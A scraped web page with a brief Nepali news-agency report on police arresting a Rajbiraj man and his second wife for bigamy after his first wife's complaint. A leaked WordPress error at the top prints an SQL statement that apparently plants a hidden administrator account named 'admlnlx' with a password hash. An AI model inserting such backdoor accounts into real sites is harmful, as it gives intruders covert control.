WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BB/ogdFxUMn01tTgGWkFrHL.hdtw0p1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 02:30:01', '', 'admlnlx', 'admlnlx')
राजविराज, पुस ७ –
बहुविवाहको आरोपमा डिवन गाविस–१ का ३५ वर्षीय उमेशप्रसाद यादव र उनकी कान्छी पत्नी २० वर्षीया बुचीकुमारी यादवलाई प्रहरीले आज पक्राउ गरेको छ ।
जिल्लाको नर्घौ गाविस–५ स्थित माइती घर भएकी उमेशकी जेठी पत्नी ३२ वर्षीया रम्भाकुमारी यादवले पुस १ गते प्र्रहरीमा दिएको उजुरीका आधारमा उमेशलाई पक्राउ गरिएको प्रहरीले जनाएको छ ।
रम्भालाई उमेशले २०७३ वैशाखमा कुटपिट गरी घरनिकाला गरेपछि उनी माइतीमै बस्दै आएकी हुन् ।
दुवैजनाले गत मङ्सिर ५ गते विवाह गरेको थाहा पाएपछि घरनिकाला भएर माइती बसेकी पीडित रम्भाले प्रहरीमा उजुरी दिएकी थिइन् ।
उमेश र रम्भाबीच २०६२ फागुण २८ गते सामाजिक परम्पराअनुसार विवाह भएको बताइएको छ । – रासस